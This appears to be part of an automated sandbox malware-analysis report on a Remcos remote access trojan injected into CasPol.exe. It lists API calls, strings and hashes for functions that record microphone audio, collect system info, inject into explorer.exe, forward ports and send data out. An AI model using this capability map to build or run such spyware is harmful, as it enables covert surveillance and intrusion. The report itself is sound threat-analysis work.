                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                            • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                            • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                            • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                            • _free.LIBCMT ref: 0043947A
                                                                                                            • _free.LIBCMT ref: 00439481
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2441525078-0
                                                                                                            • Opcode ID: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                                                                                                            • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                            • Opcode Fuzzy Hash: 49a4e998ced2e249282c630ffc9b744f5a4c3aafdaefe9346f23a023119a2075
                                                                                                            • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                            • API String ID: 2956720200-749203953
                                                                                                            • Opcode ID: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                                                                                                            • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                            • Opcode Fuzzy Hash: cbb5f636b947a9be11331952989b716aa7a045616e8d2ead7045bb7ad60c484e
                                                                                                            • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                            • Opcode ID: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                                                                                                            • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                            • Opcode Fuzzy Hash: 7554bfeb40c4b2af2b7365563deb2cc3d5ba60fa6237755d2b448c11faa41bd7
                                                                                                            • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                            • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess
                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                            • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                            • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                            • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                            • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                            • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                            • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                            • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00446DEF
                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                            • _free.LIBCMT ref: 00446DFB
                                                                                                            • _free.LIBCMT ref: 00446E06
                                                                                                            • _free.LIBCMT ref: 00446E11
                                                                                                            • _free.LIBCMT ref: 00446E1C
                                                                                                            • _free.LIBCMT ref: 00446E27
                                                                                                            • _free.LIBCMT ref: 00446E32
                                                                                                            • _free.LIBCMT ref: 00446E3D
                                                                                                            • _free.LIBCMT ref: 00446E48
                                                                                                            • _free.LIBCMT ref: 00446E56
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                            • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Eventinet_ntoa
                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                            • Opcode ID: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                                                                                                            • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                            • Opcode Fuzzy Hash: 7a3eb9bb34aefebffdfa72ae085434fee76c639cdb65a0c6d939355de7a733be
                                                                                                            • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                            APIs
                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DecodePointer
                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                            • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                            • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                            • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                            • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                            • Opcode ID: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                                                                                                            • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                            • Opcode Fuzzy Hash: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                                                                                                            • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                            APIs
                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                            • Opcode ID: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                                                                                                            • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                            • Opcode Fuzzy Hash: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                                                                                                            • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                            • String ID: XCG$`=G$x=G
                                                                                                            • API String ID: 1356121797-903574159
                                                                                                            • Opcode ID: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                                                                                                            • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                            • Opcode Fuzzy Hash: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                                                                                                            • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                              • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                              • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                              • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                            • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                            • String ID: Remcos
                                                                                                            • API String ID: 1970332568-165870891
                                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                            • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                            • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                            • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                            • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                            • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                                                                                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                                                                                            • __freea.LIBCMT ref: 00452DBA
                                                                                                            • __freea.LIBCMT ref: 00452DC6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 201697637-0
                                                                                                            • Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                                                                                                            • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                            • Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                                                                                                            • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                            • _free.LIBCMT ref: 00444724
                                                                                                            • _free.LIBCMT ref: 0044473D
                                                                                                            • _free.LIBCMT ref: 0044476F
                                                                                                            • _free.LIBCMT ref: 00444778
                                                                                                            • _free.LIBCMT ref: 00444784
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                            • String ID: C
                                                                                                            • API String ID: 1679612858-1037565863
                                                                                                            • Opcode ID: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                                                                                                            • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                            • Opcode Fuzzy Hash: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                                                                                                            • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tcp$udp
                                                                                                            • API String ID: 0-3725065008
                                                                                                            • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                            • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                            • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                            • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                            • String ID: .part
                                                                                                            • API String ID: 1303771098-3499674018
                                                                                                            • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                                                            • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                            • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                                                                                                            • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                            • _wcslen.LIBCMT ref: 0041A906
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                            • API String ID: 37874593-703403762
                                                                                                            • Opcode ID: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                                                                                                            • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                            • Opcode Fuzzy Hash: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                                                                                                            • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                                                                                                            • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
